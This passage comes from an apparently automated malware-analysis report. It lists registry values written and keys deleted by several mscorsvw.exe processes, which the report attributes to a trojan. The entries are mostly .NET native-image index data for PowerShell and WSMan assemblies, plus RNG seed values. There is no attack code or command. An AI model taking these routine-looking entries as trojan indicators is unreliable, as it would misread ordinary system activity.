"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3720 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigMask" = "4361"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"MVID" = "E2 17 82 39 6B BC 18 53 A8 67 A6 33 0D FD 66 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\afa163\1f\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index65]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"ILDependencies" = "57 8D AB 19 D0 02 1A 29 07 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 2E 64 E6 AE 08 BF E2 7D E3 6D DE A8 45 1D 33"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "101"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
The process mscorsvw.exe:2516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 1F 08 3D E5 D1 E2 7A CD C8 4F 80 9A 86 D6 F9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3204 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "B4 3A 87 EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 43 1D 91 42 14 FE 19 22 6D EE 2C 17 60 F3 A9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:3784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A C9 1A AF B5 F9 33 22 24 22 AF 26 FA 17 70 49"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 27 59 D7 66 A9 0A 08 00 19 DD 14 F7 DC 56 22"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "FC 34 03 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 3F 30 92 77 23 50 21 B2 51 47 A3 DE 89 10 BE"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "50 1F 2E EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
The process mscorsvw.exe:3036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "AE C2 AF EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 7A D0 BA 2A 3C C7 9F 4C AF 04 52 1B 26 9E E5"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
The process mscorsvw.exe:2896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD B9 65 89 E4 A9 00 53 2B 97 DD C3 BF 3B E0 F9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 92 24 AA 1A 02 AF 2F 6E 4F FB 89 13 68 C2 AB"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "B4 1B 7D F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
The process mscorsvw.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "1A BA 69 EC C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
